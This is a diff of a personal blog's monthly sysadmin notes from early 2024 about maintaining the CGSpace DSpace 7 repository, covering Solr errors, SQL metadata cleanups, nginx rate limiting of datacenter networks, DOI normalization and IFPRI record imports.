2024-01-09 06:23:35,893 ERROR unknown unknown org.dspace.authorize.AuthorizeServiceImpl @ Failed getting getting community/collection admin status for bahhhhh@cgiar.org The search error is: Error from server at http://localhost:8983/solr/search: org.apache.solr.search.SyntaxError: Cannot parse 'search.resourcetype:Community AND (admin:eef481147-daf3-4fd2-bb8d-e18af8131d8c OR admin:g80199ef9-bcd6-4961-9512-501dea076607 OR admin:g4ac29263-cf0c-48d0-8be7-7f09317d50ec OR admin:g0e594148-a0f6-4f00-970d-6b7812f89540 OR admin:g0265b87a-2183-4357-a971-7a5b0c7add3a OR admin:g371ae807-f014-4305-b4ec-f2a8f6f0dcfa OR admin:gdc5cb27c-4a5a-45c2-b656-a399fded70de OR admin:ge36d0ece-7a52-4925-afeb-6641d6a348cc OR admin:g15dc1173-7ddf-43cf-a89a-77a7f81c4cfc OR admin:gc3a599d3-c758-46cd-9855-c98f6ab58ae4 OR admin:g3d648c3e-58c3-4342-b500-07cba10ba52d OR admin:g82bf5168-65c1-4627-8eb4-724fa0ea51a7 OR admin:ge751e973-697d-419c-b59b-5a5644702874 OR admin:g44dd0a80-c1e6-4274-9be4-9f342d74928c OR admin:g4842f9c2-73ed-476a-a81a-7167d8aa7946 OR admin:g5f279b3f-c2ce-4c75-b151-1de52c1a540e OR admin:ga6df8adc-2e1d-40f2-8f1e-f77796d0eecd OR admin:gfdfc1621-382e-437a-8674-c9007627565c OR admin:g15cd114a-0b89-442b-a1b4-1febb6959571 OR admin:g12aede99-d018-4c00-b4d4-a732541d0017 OR admin:gc59529d7-002a-4216-b2e1-d909afd2d4a9 OR admin:gd0806714-bc13-460d-bedd-121bdd5436a4 OR admin:gce70739a-8820-4d56-b19c-f191855479e4 OR admin:g7d3409eb-81e3-4156-afb1-7f02de22065f OR admin:g54bc009e-2954-4dad-8c30-be6a09dc5093 OR admin:gc5e1d6b7-4603-40d7-852f-6654c159dec9 OR admin:g0046214d-c85b-4f12-a5e6-2f57a2c3abb0 OR admin:g4c7b4fd0-938f-40e9-ab3e-447c317296c1 OR admin:gcfae9b69-d8dd-4cf3-9a4e-d6e31ff68731 OR ... admin:g20f366c0-96c0-4416-ad0b-46884010925f)': too many boolean clauses The search resourceType filter was: search.resourcetype:Community
```
- There are 1,805 OR clauses in the full log!
- We previous had this issue in 2020-01 and 2020-02 with DSpace 5 and DSpace 6
- At the time the solution was to increase the `maxBooleanClauses` in Solr and to disable access rights awareness, but I don't think we want to do the second one now
- I saw many users of Solr in other applications increasing this to obscenely high numbers, so I think we should be OK to increase it from 1024 to 2048
- Re-visiting the DSpace user groomer to delete inactive users
- In 2023-08 I noticed that this was now [possible in DSpace 7](https://github.com/DSpace/DSpace/pull/2928)
- As a test I tried to delete all users who have been inactive since six years ago (Janury 9, 2018):
```console
$ dspace dsrun org.dspace.eperson.Groomer -a -b 01/09/2018 -d
```
- I tested it on DSpace 7 Test and it worked... I am debating running it on CGSpace...
- I see we have almost 9,000 users:
```console
$ dspace user -L > /tmp/users-before.txt
$ wc -l /tmp/users-before.txt
8943 /tmp/users-before.txt
```
- I decided to do the same on CGSpace and it worked without errors
- I finished working on the controlled vocabulary for publishers
## 2024-01-10
- I spent some time deleting old groups on CGSpace
- I looked into the use of the `cg.identifier.ciatproject` field and found there are only a handful of uses, with some even seeming to be a mistake:
```console
localhost/dspace7= ☘ SELECT DISTINCT text_value AS "cg.identifier.ciatproject", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata
_field_id = 232 GROUP BY "cg.identifier.ciatproject" ORDER BY count DESC;
cg.identifier.ciatproject │ count
───────────────────────────┼───────
D145 │ 4
LAM_LivestockPlus │ 2
A215 │ 1
A217 │ 1
A220 │ 1
A223 │ 1
A224 │ 1
A227 │ 1
A229 │ 1
A230 │ 1
CLIMATE CHANGE MITIGATION │ 1
LIVESTOCK │ 1
(12 rows)
Time: 240.041 ms
```
- I think we can move those to a new `cg.identifier.project` if we create one
- The `cg.identifier.cpwfproject` field is similarly sparse, but the CCAFS ones are widely used
## 2024-01-12
- Export a list of affiliations to do some cleanup:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT text_value AS "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id = 211 GROUP BY "cg.contributor.affiliation" ORDER BY count DESC) to /tmp/2024-01-affiliations.csv WITH CSV HEADER;
COPY 11719
```
- I first did some clustering and editing in OpenRefine, then I'll import those back into CGSpace and then do another export
- Troubleshooting the statistics pages that aren't working on DSpace 7
- On a hunch, I queried for for Solr statistics documents that **did not have an `id` matching the 36-character UUID pattern**:
```console
$ curl 'http://localhost:8983/solr/statistics/select?q=-id%3A%2F.\{36\}%2F&rows=0'
{
"responseHeader":{
"status":0,
"QTime":0,
"params":{
"q":"-id:/.{36}/",
"rows":"0"}},
"response":{"numFound":800167,"start":0,"numFoundExact":true,"docs":[]
}}
```
- They seem to come mostly from 2020, 2023, and 2024:
```console
$ curl 'http://localhost:8983/solr/statistics/select?q=-id%3A%2F.\{36\}%2F&facet.range=time&facet=true&facet.range.start=2010-01-01T00:00:00Z&facet.range.end=NOW&facet.range.gap=%2B1YEAR&rows=0'
{
"responseHeader":{
"status":0,
"QTime":13,
"params":{
"facet.range":"time",
"q":"-id:/.{36}/",
"facet.range.gap":"+1YEAR",
"rows":"0",
"facet":"true",
"facet.range.start":"2010-01-01T00:00:00Z",
"facet.range.end":"NOW"}},
"response":{"numFound":800168,"start":0,"numFoundExact":true,"docs":[]
},
"facet_counts":{
"facet_queries":{},
"facet_fields":{},
"facet_ranges":{
"time":{
"counts":[
"2010-01-01T00:00:00Z",0,
"2011-01-01T00:00:00Z",0,
"2012-01-01T00:00:00Z",0,
"2013-01-01T00:00:00Z",0,
"2014-01-01T00:00:00Z",0,
"2015-01-01T00:00:00Z",89,
"2016-01-01T00:00:00Z",11,
"2017-01-01T00:00:00Z",0,
"2018-01-01T00:00:00Z",0,
"2019-01-01T00:00:00Z",0,
"2020-01-01T00:00:00Z",1339,
"2021-01-01T00:00:00Z",0,
"2022-01-01T00:00:00Z",0,
"2023-01-01T00:00:00Z",653736,
"2024-01-01T00:00:00Z",144993],
"gap":"+1YEAR",
"start":"2010-01-01T00:00:00Z",
"end":"2025-01-01T00:00:00Z"}},
"facet_intervals":{},
"facet_heatmaps":{}}}
```
- They seem to come from 2023-08 until now (so way before we migrated to DSpace 7):
```console
$ curl 'http://localhost:8983/solr/statistics/select?q=-id%3A%2F.\{36\}%2F&facet.range=time&facet=true&facet.range.start=2023-01-01T00:00:00Z&facet.range.end=NOW&facet.range.gap=%2B1MONTH&rows=0'
{
"responseHeader":{
"status":0,
"QTime":196,
"params":{
"facet.range":"time",
"q":"-id:/.{36}/",
"facet.range.gap":"+1MONTH",
"rows":"0",
"facet":"true",
"facet.range.start":"2023-01-01T00:00:00Z",
"facet.range.end":"NOW"}},
"response":{"numFound":800168,"start":0,"numFoundExact":true,"docs":[]
},
"facet_counts":{
"facet_queries":{},
"facet_fields":{},
"facet_ranges":{
"time":{
"counts":[
"2023-01-01T00:00:00Z",1,
"2023-02-01T00:00:00Z",0,
"2023-03-01T00:00:00Z",0,
"2023-04-01T00:00:00Z",0,
"2023-05-01T00:00:00Z",0,
"2023-06-01T00:00:00Z",0,
"2023-07-01T00:00:00Z",0,
"2023-08-01T00:00:00Z",27621,
"2023-09-01T00:00:00Z",59165,
"2023-10-01T00:00:00Z",115338,
"2023-11-01T00:00:00Z",96147,
"2023-12-01T00:00:00Z",355464,
"2024-01-01T00:00:00Z",125429],
"gap":"+1MONTH",
"start":"2023-01-01T00:00:00Z",
"end":"2024-02-01T00:00:00Z"}},
"facet_intervals":{},
"facet_heatmaps":{}}}
```
- I see that we had 31,744 statistic events yesterday, and 799 have no `id`!
- I asked about this on Slack and will file an issue on GitHub if someone else also finds such records
- Several people said they have them, so it's a bug of some sort in DSpace, not our configuration
## 2024-01-13
- Yesterday alone we had 37,000 unique IPs making requests to nginx
- I looked up the ASNs and found 6,000 IPs from this network in Amazon Singapore: 47.128.0.0/14
## 2024-01-15
- Investigating the CSS selector warning that I've seen in PM2 logs:
```console
0|dspace-ui | 1 rules skipped due to selector errors:
0|dspace-ui | .custom-file-input:lang(en)~.custom-file-label -> unmatched pseudo-class :lang
```
- It seems to be a bug in Angular, as this selector comes from Bootstrap 4.6.x and is not invalid
- But that led me to a more interesting issue with `inlineCritical` optimization for styles in Angular SSR that might be responsible for causing high load in the frontend
- See: https://github.com/angular/angular/issues/42098
- See: https://github.com/angular/universal/issues/2106
- See: https://github.com/GoogleChromeLabs/critters/issues/78
- Since the production site was flapping a lot I decided to try disabling inlineCriticalCss
- There have been on and off load issues with the Angular frontend today
- I think I will just block all data center network blocks for now
- In the last week I see almost 200,000 unique IPs:
```console
# zcat -f /var/log/nginx/*access.log /var/log/nginx/*access.log.1 /var/log/nginx/*access.log.2.gz /var/log/nginx/*access.log.3.gz /var/log/nginx/*access.log.4.gz /var/log/nginx/*access.log.5.gz /var/log/nginx/*access.log.6.gz | awk '{print $1}' | sort -u |
tee /tmp/ips.txt | wc -l
196493
```
- Looking these IPs up I see there are 18,000 coming from Comcast, 10,000 from AT&T, 4110 from Charter, 3500 from Cox and dozens of other residential IPs
- I highly doubt these are home users browsing CGSpace... seems super fishy
- Also, over 1,000 IPs from SpaceX Starlink in the last week. RIGHT
- I will temporarily add a few new datacenter ISP network blocks to our rate limit:
- 16509 Amazon-02
- 701 UUNET
- 8075 Microsoft
- 15169 Google
- 14618 Amazon-AES
- 396982 Google Cloud
- The load on the server *immediately* dropped
## 2024-01-17
- It turns out AS701 (UUNET) is Verizon Business, which is used as an ISP for many staff at IFPRI
- This was causing them to see HTTP 429 "too many requests" errors on CGSpace
- I removed this ASN from the rate limiting
## 2024-01-18
- Start looking at Solr stats again
- I found one statistics record that has 22,000 of the same collection in `owningColl` and 22,000 of the same community in `owningComm`
- The record is from 2015 and think it would be easier to delete it than fix it:
```console
$ curl http://localhost:8983/solr/statistics/update -H "Content-type: text/xml" --data-binary '<delete><query>uid:3b4eefba-a302-4172-a286-dcb25d70129e</query></delete>'
```
- Looking again, there are at least 1,000 of these so I will need to come up with an actual solution to fix these
- I'm noticing we have 1,800+ links to defunct resources on bioversityinternational.org in the `cg.link.permalink` field
- I should ask Alliance if they have any plans to fix those, or upload them to CGSpace
## 2024-01-22
- Meeting with IWMI about ORCID integration on CGSpace now that we've migrated to DSpace 7
- File an issue for the inaccurate DSpace statistics: https://github.com/DSpace/DSpace/issues/9275
## 2024-01-23
- Meeting with IWMI about ORCID integration and the DSpace API for use with WordPress
- IFPRI sent me an list of their author ORCIDs to add to our controlled vocabulary
- I joined them with our current list and resolved their names on ORCID and updated them in our database:
```console
$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml ~/Downloads/IFPRI\ ORCiD\ All.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2024-01-23-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2024-01-23-orcids.txt -o /tmp/2024-01-23-orcids-names.txt -d
$ ./ilri/update_orcids.py -i /tmp/2024-01-23-orcids-names.txt -db dspace -u dspace -p fuuu
```
- This adds about 400 new identifiers to the controlled vocabulary
- I consolidated our various project identifier fields for closed programs into one `cg.identifer.project`:
- `cg.identifier.ccafsproject`
- `cg.identifier.ccafsprojectpii`
- `cg.identifier.ciatproject`
- `cg.identifier.cpwfproject`
- I prefixed the existing 2,644 metadata values with "CCAFS", "CIAT", or "CPWF" so we can figure out where they came from if need be, and deleted the old fields from the metadata registry
## 2024-01-26
- Minor work on dspace-angular to clean up component styles
- Add `cg.identifier.publicationRank` to CGSpace metadata registry and submission form
## 2024-01-29
- Rework the nginx bot and network limits slightly to remove some old patterns/networks and remove Google
- The Google Scholar team contacted me to ask why their requests were timing out (well...)
<!-- vim: set sw=2 ts=2: -->

118
content/posts/2024-02.md Normal file
View File

@ -0,0 +1,118 @@
---
title: "February, 2024"
date: 2024-02-05T11:10:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-02-05
- Delete duplicate metadata as described in my DSpace issue from last year: https://github.com/DSpace/DSpace/issues/8253
- Lower case all the AGROVOC subjects on CGSpace
<!--more-->
```sql
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 180
dspace=*# COMMIT;
COMMIT
```
## 2024-02-06
- Discuss IWMI using the CGSpace REST API for their new website
- Export the IWMI community to extract their ORCID identifiers:
```console
$ dspace metadata-export -i 10568/16814 -f /tmp/iwmi.csv
$ csvcut -c 'cg.creator.identifier,cg.creator.identifier[en_US]' ~/Downloads/2024-02-06-iwmi.csv \
| grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' \
| sort -u \
| tee /tmp/iwmi-orcids.txt \
| wc -l
353
$ ./ilri/resolve_orcids.py -i /tmp/iwmi-orcids.txt -o /tmp/iwmi-orcids-names.csv -d
```
- I noticed some similar looking names in our list so I clustered them in OpenRefine and manually checked a dozen or so to update our list
## 2024-02-07
- Maria asked me about the "missing" item from last week again
- I can see it when I used the Admin search, but not in her workflow
- It was submitted by TIP so I checked that user's workspace and found it there
- After depositing, it went into the workflow so Maria should be able to see it now
## 2024-02-09
- Minor edits to CGSpace submission form
- Upload 55 ISNAR book chapters to CGSpace from Peter
## 2024-02-19
- Looking into the collection mapping issue on CGSpace
- It seems to be by design in DSpace 7: https://github.com/DSpace/dspace-angular/issues/1203
- This is a massive setback for us...
## 2024-02-20
- Minor work on OpenRXV to fix a bug in the ng-select drop downs
- Minor work on the DSpace 7 nginx configuration to allow requesting robots.txt and sitemaps without hitting rate limits
## 2024-02-21
- Minor updates on OpenRXV, including one bug fix for missing mapped collections
- Salem had to re-work the harvester for DSpace 7 since the mapped collections and parent collection list are separate!
## 2024-02-22
- Discuss tagging of datasets and re-work the submission form to encourage use of DOI field for any item that has a DOI, and the normal URL field if not
- The "cg.identifier.dataurl" field will be used for "related" datasets
- I still have to check and move some metadata for existing datasets
## 2024-02-23
- This morning Tomcat died due to an OOM kill from the kernel:
```console
kernel: Out of memory: Killed process 698 (java) total-vm:14151300kB, anon-rss:9665812kB, file-rss:320kB, shmem-rss:0kB, UID:997 pgtables:20436kB oom_score_adj:0
```
- I don't see any abnormal pattern in my Grafana graphs, for JVM or system load... very weird
- I updated the submission form on CGSpace to include the new changes to URLs for datasets
- I also updated about 80 datasets to move the URLs to the correct field
## 2024-02-25
- This morning Tomcat died while I was doing a CSV export, with an OOM kill from the kernel:
```console
kernel: Out of memory: Killed process 720768 (java) total-vm:14079976kB, anon-rss:9301684kB, file-rss:152kB, shmem-rss:0kB, UID:997 pgtables:19488kB oom_score_adj:0
```
- I don't know why this is happening so often recently...
## 2024-02-27
- IFPRI sent me a list of authors to add to our list for now, until we can find a better way of doing it
- I extracted the existing authors from our controlled vocabulary and combined them with IFPRI's:
```console
$ xmllint --xpath '//node/isComposedBy/node()' dspace/config/controlled-vocabularies/dc-contributor-author.xml \
| grep -oE 'label=".*"' \
| sed -e 's/label="//' -e 's/"$//' > /tmp/authors
$ cat /tmp/authors /tmp/ifpri-authors | sort -u > /tmp/new-authors
```
## 2024-02-28
- I figured out a way to add a new Angular component to handle all our relation fields
## 2024-02-29
- Clean up a bunch of metadata on CGSpace
<!-- vim: set sw=2 ts=2: -->

207
content/posts/2024-03.md Normal file
View File

@ -0,0 +1,207 @@
---
title: "March, 2024"
date: 2024-03-01T09:55:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-03-01
- Last week Bizu reported an issue with the "browse by issue date" drop down
- I verified it, and suspect it could be due to missing issue dates...
- It might be this issue: https://github.com/DSpace/dspace-angular/issues/2808
<!--more-->
- I spent some time trying to reproduce the bug affecting `onebox` fields that are configured to use external vocabularies and are not repeatable
- I filed an issue: https://github.com/DSpace/dspace-angular/issues/2846
## 2024-03-03
- I did some cleanups on abstracts, licenses, and dates from CrossRef
- I also did some minor cleanups to affiliations because I saw some incorrect and duplicate ones in our list
## 2024-03-05
- I tried a new technique to get some affiliations from Crossref using OpenRefine
- First I split them and clustered, resolving a few hundred clusters out of 1500 (!)
- Then I used a custom text facet with a few dozen CGIAR and other large affiliations to reduce the work
- Then I joined them with our affiliations, paying no attention to duplicates
- Then I deduped them using the Jython technique I learned in 2023-02
## 2024-03-06
- Peter sent me some more corrections for the authors that I had sent him in 2023-12
## 2024-03-08
- IFPRI sent me their 2023 records from CONTENTdm so I started working on those
- I found a way to match their ORCID identifiers in our list using Jython in OpenRefine:
```python
import re
with open(r"/tmp/cg-creator-identifier.txt",'r') as f :
orcid_ids = [orcid_id.strip() for orcid_id in f]
matched = False
for orcid_id in orcid_ids:
if re.search(r'.+: {}'.format(value), orcid_id):
matched = True
break
if matched:
return orcid_id
else:
return value
```
- I realized that [UNICEF was renamed to its current name in 1953](https://www.unicef.org/about-unicef/frequently-asked-questions#3) so I replaced all other variations in our vocabularies and metadata:
```sql
UPDATE metadatavalue SET text_value='United Nations Children''s Fund' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value IN ('United Nations International Children''s Emergency Fund', 'United Nations International Children''s Emergency Fund', 'UNICEF');
```
- Note the use of two single quotes to escape the one in the name
## 2024-03-11
- Experimenting with moving some of my Python scripts to the DSpace 7 REST API
- I need a way to get UUIDs for Handles...
- Seems that I can use a Discovery query like: https://dspace7test.ilri.org/server/api/discover/search/objects?dsoType=item&query=handle:10568/130864
- Then just take the first result...?
- I spent some time working on the script get abstracts from CGSpace, and found a bug in my logic
- I also noticed that one item had two abstracts, but the first one was blank!
- Looking deeper, I found 113 blank metadata values so I deleted those:
```sql
BEGIN;
DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value='';
COMMIT;
```
- I also found a few dozen items with "N/A" for their citation, so I deleted those too:
```sql
BEGIN;
DELETE FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_value='N/A' AND metadata_field_id=146;
COMMIT;
```
- I deployed the change to disable Angular SSR's `inlineCriticalCss` on production because we had heavy load on the frontend and I've been meaning to do this permanently for some time
- Maria asked me for a CSV with all the broken Bioversity permalinks so I exported them for her:
```console
$ csvcut -c 'id,dc.title[en_US],dc.identifier.uri[en_US],cg.link.permalink[en_US]' ~/Downloads/2024-03-05-cgspace.csv \
| csvgrep -c 'cg.link.permalink[en_US]' -r '^.+$' > /tmp/2024-03-11-Bioversity-Permalinks.csv
```
## 2024-03-12
- Run the duplicate checker for IFPRI 2023 batch upload
## 2024-03-13
- I found about 428 duplicates in the IFPRI 2023 batch records
- Alarmingly, I found about 18 that are duplicated on CGSpace as well!
- I looked closer and decided that 11 were duplicates, so I merged the metadata and withdrew the later ones
- Alliance asked me to get him the Handles for items submitted by TIP that are not discoverable
- I found it easiest to use the `ds6_item2itemhandle` [DSpace SQL helper function](https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+6) with a nested query on the provenance:
```sql
SELECT ds6_item2itemhandle(dspace_object_id) AS handle FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item WHERE NOT discoverable) AND metadata_field_id=28 AND text_value LIKE 'Submitted by Alliance TIP Submit%';
```
## 2024-03-14
- Looking in to reports of rate limiting of Altmetric's bot on CGSpace
- I don't see any HTTP 429 responses for their user agents in any of our logs...
- I tried myself on an item page and never hit a limit...
```console
$ for num in {1..60}; do echo -n "Request ${num}: "; curl -s -o /dev/null -w "%{http_code}" https://dspace7test.ilri.org/items/c9b8999d-3001-42ba-a267-14f4bfa90b53 && echo; done
Request 1: 200
Request 2: 200
Request 3: 200
Request 4: 200
...
Request 60: 200
```
- All responses were HTTP 200...
- In any case, I whitelisted their production IPs and told them to try again
- I imported 468 of IFPRI's 2023 records that were confirmed to not be duplicates to CGSpace
- I also spent some time merging metadata from 415 of the remaining 432 duplicates with the metadata for the existing items on CGSpace
- This was a bit of dirty work using csvkit, xsv, and OpenRefine
## 2024-03-17
- There are 17 records from IFPRI's 2023 batch that are remaining from the 432 that I identified as already being on CGSpace
- These are different in that they are duplicates on CGSpace as well, so the csvjoin failed and the metadata got messed up in my migration
- I looked closer and whittled this down to 14 actual records, and spent some time working on them
- I isolated 12 of these items that existed on CGSpace and added publication ranks, project identifiers, and provenance links
- Now there only remain two confusing records about the Inkomati catchment
## 2024-03-18
- Checking to see how many IFPRI records we have migrated so far:
```console
$ csvgrep -c 'dc.description.provenance[en_US]' -m 'Original URL from IFPRI CONTENTdm' cgspace.csv \
| csvcut -c 'id,dc.title[en_US],dc.identifier.uri[en_US],dc.description.provenance[en_US],dcterms.type[en_US]' \
| tee /tmp/ifpri-records.csv \
| csvstat --count
898
```
- I finalized the remaining two on Inkomati catchment and now we are at 900!
# 2024-03-19
- IWMI sent me some new author ORCID identifiers so I updated our list
- Started working on updating my data for the Ontology CoP webinar on CGIAR and AGROVOC
- First extracting all unique subjects on CGSpace:
```
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119)) to /tmp/2024-03-19-cgspace-subjects.csv WITH CSV HEADER;
COPY 28024
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2024-03-19-cgspace-subjects.csv | sed '1d' > /tmp/2024-03-19-cgspace-subjects.txt
$ ./ilri/agrovoc_lookup.py -i /tmp/2024-03-19-cgspace-subjects.txt -o /tmp/2024-03-19-cgspace-subjects-results.csv
```
## 2024-03-20
- Identify seven duplicates on CGSpace from the PRMS results and withdraw them from CGSpace
## 2024-03-21
- Look more closely at duplicates on CGSpace based on a fresh export
- Using DOIs I found ~842 that occur more than once for journal articles alone, so probably around 400 duplicates
- I did a handful of them, merging the metadata and withdrawing the duplicate, and decided to add `dcterms.replaces` with the handle in the original
## 2024-03-22
- Look at duplicate DOIs on CGSpace and address a dozen or so
## 2024-03-23
- Look at duplicate DOIs on CGSpace and address a dozen or so
- Update Tomcat and Solr to latest versions
- I had done some tests with these last week, and did a last minute test on DSpace 7 Test to make sure submission and searching worked
## 2024-03-24
- Slowly process several dozen more duplicate DOIs on CGSpace, sigh...
## 2024-03-26
- File an issue on dspace-angular about improving withdrawn item tombstones: https://github.com/DSpace/dspace-angular/issues/2880
- Merge metadata and withdraw more duplicates on CGSpace
<!-- vim: set sw=2 ts=2: -->

169
content/posts/2024-04.md Normal file
View File

@ -0,0 +1,169 @@
---
title: "April, 2024"
date: 2024-04-04T10:23:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-04-04
- Work on CGSpace duplicate DOIs more
<!--more-->
## 2024-04-08
- Start working on IFPRI's 2022 batch import
- I ran the duplicate checker against CGSpace and started downloading all linked PDFs
## 2024-04-09
- Continue working on IFPRI's 2022 batch import
- I started validating the potential duplicates in OpenRefine
## 2024-04-12
- Finish working on the 650 IFPRI 2022 records that were not already on CGSpace, then uploaded them
- I need to merge the metadata for the remaining 212 that are already on CGSpace
- Spend some time looking at duplicate DOIs again...
## 2024-04-13
- Spend some time looking at duplicate DOIs again...
## 2024-04-14
- Spend some time looking at duplicate DOIs again...
## 2024-04-15
- Spend some time looking at duplicate DOIs again...
- Delete ~260 duplicate metadata values using the elaborate SQL and sort method I documented here: https://github.com/DSpace/DSpace/issues/8253#issuecomment-1331756418
- Tony noticed that the DSpace 7 REST API is very slow with the embeds so I profiled a bit:
```
$ time curl -s -o /dev/null 'https://cgspace.cgiar.org/server/api/discover/search/objects?query=cg.identifier.project%3AIFPRI*&scope=8f1e9650-fe87-4e6e-889a-1cacfb747408&page=0&size=100&embed=thumbnail,bundles/bitstreams&sort=dcterms.issued,desc'
curl -s -o /dev/null 0.01s user 0.01s system 0% cpu 47.515 total
$ time curl -s -o /dev/null 'https://cgspace.cgiar.org/server/api/discover/search/objects?query=cg.identifier.project%3AIFPRI*&scope=8f1e9650-fe87-4e6e-889a-1cacfb747408&page=0&size=100&sort=dcterms.issued,desc'
curl -s -o /dev/null 0.01s user 0.01s system 0% cpu 4.764 total
```
- Finalize processing the remaining 206 items from the IFPRI 2022 batch set that already existed on CGSpace
- I merged metadata with the existing items
- There are still six remaining items that I identified as being duplicates (3x2) in the IFPRI set itself
## 2024-04-16
- Spend some time looking at duplicate DOIs again...
- Assist Deborah with an advanced query on CGSpace for biodiversity and health:
```
dcterms.issued:[2010 TO 2024] AND dcterms.type:"Journal Article" AND (dc.title:"biodiversity" OR dcterms.subject:"biodiversity" OR dc.title:"health" OR dcterms.subject:"health")
```
- Remove CIMMYT URLs and citations from 277 journal articles on CGSpace since it is a bit tacky
- I used this Jython expression in OpenRefine with [Crossref's content negotiation](https://citation.crosscite.org/docs.html) to get citations for all DOIs:
```python
import urllib2
doi = cells['cg.identifier.doi[en_US]'].value
url = "https://api.crossref.org/works/" + doi + "/transform/text/x-bibliography"
useragent = "Python (mailto:a.o@cgiar.org)"
request = urllib2.Request(url.encode("utf-8"), headers={"User-Agent" : useragent})
get = urllib2.urlopen(request)
return get.read().decode('utf-8')
```
- It took ten or so minutes for it to finish (and note this is Python 2 inside OpenRefine so I had to be careful with Unicode), but worked well!
## 2024-04-18
- Write a SQL query to build the IFPRI CONTENTdm redirects to Handles:
```sql
SELECT m.text_value, h.handle FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=28 AND m.text_value LIKE 'Original URL%' AND h.resource_type_id=2;
```
- Similarly, I need a SQL query to get the redirects for duplicate Handles, querying for `dcterms.replaces`:
```sql
SELECT m.text_value AS handle_from, h.handle AS handle_to FROM metadatavalue m JOIN handle h on m.dspace_object_id = h.resource_id WHERE m.metadata_field_id=181 AND h.resource_type_id=2;
```
- Then I can work that list into an nginx map with redirect, for example:
```console
server {
...
if ($new_uri) {
return 301 $new_uri;
}
}
map $request_uri $new_uri {
/handle/10568/112821 /handle/10568/97605;
}
```
## 2024-04-19
- Spend some time looking at duplicate DOIs again...
- Refresh ORCID identifiers from ORCID API and update CGSpace metadata and controlled vocabulary
## 2024-04-20
- I read an [interesting thread about DOI casing](https://github.com/greenelab/scihub/issues/9)
- Apparently the DOI specification says ASCII characters in DOIs are case insensitive
- Indeed, [Crossref recommends lower case](https://www.crossref.org/documentation/member-setup/constructing-your-dois/) for all DOIs
- I was curious about the DOIs in our database so I checked before and after lower casing:
```console
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(text_value) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=220 AND text_value IS NOT NULL AND text_value !='') TO /tmp/dois-sql-before.txt;
COPY 25675
localhost/dspace7= ☘ \COPY (SELECT DISTINCT(lower(text_value)) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=220 AND text_value IS NOT NULL AND text_value !='') TO /tmp/dois-sql-after.txt;
COPY 25666
```
- I need to investigate options for lower casing these in the repository, for example in a curation task, and in all workflows around DSpace metadata...
## 2024-04-23
- Spent some time writing a Java curation task to normalize DOIs in items when they enter the workflow edit step
- The workflow curation tasks are not documented very well but I got a basic configuration working
- I found a bug in DSpace curation tasks and discussed on Slack
- I finalized the `NormalizeDOIs` curation task and released v7.6.1.1 of the [cgspace-java-helpers](https://github.com/ilri/cgspace-java-helpers) project
## 2024-04-24
- A bit more testing of the curation tasks
- I tested a patch by Mark Wood
- I added support for normalizing DOIs to this same format to my [csv-metadata-quality](https://github.com/ilri/csv-metadata-quality) project
## 2024-04-25
- I lowercased the remaining 3,900 DOIs on CGSpace that had uppercase ASCII characters
- Spend some time looking at duplicate DOIs again...
## 2024-04-26
- Spend some time looking at duplicate DOIs again...
## 2024-04-29
- Start working on the IFPRI 20202021 batch migration
- I modified my `check_duplicates.py` script to check for DOIs instead of titles, and use a similarity of 1.0 to make sure the match is exact
- I noticed something in the Tomcat log:
```console
tomcat9[690]: WARNING: The HTTP response header [Content-Disposition] with value [attachment; filename="Literature review on Womens Empowerment and their Resilience2.pdf"] has been removed from the response because it is invalid
tomcat9[690]: java.lang.IllegalArgumentException: The Unicode character [] at code point [8,217] cannot be encoded as it is outside the permitted range of 0 to 255
```
- I found the bitstream's ID and then used the `ds6_bitstream2itemhandle` [SQL helper function](https://wiki.lyrasis.org/display/DSPACE/Helper+SQL+functions+for+DSpace+6) to find the item's handle
- Then I replaced the curly quote with a regular quote in all bistreams
<!-- vim: set sw=2 ts=2: -->

197
content/posts/2024-05.md Normal file
View File

@ -0,0 +1,197 @@
---
title: "May, 2024"
date: 2024-05-01T10:39:00+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2024-05-01
- I dumped all the CGSpace DOIs and resolved them with my `crossref_doi_lookup.py` script
- Then I did some work to add missing abstracts (about 900!), volumes, issues, licenses, publishers, and types, etc
<!--more-->
## 2024-05-05
- Spend some time looking at duplicate DOIs again...
## 2024-05-06
- Spend some time looking at duplicate DOIs again...
## 2024-05-07
- Discuss RSS feeds and OpenSearch with IWMI
- It seems our OpenSearch feed settings are using the defaults, so I need to copy some of those over from our old DSpace 6 branch
- I saw a patch for an interesting issue on DSpace GitHub: [Error submitting or deleting items - URI too long when user is in a large number of groups](https://github.com/DSpace/DSpace/issues/9544)
- I hadn't realized it, but we have lots of those errors:
```console
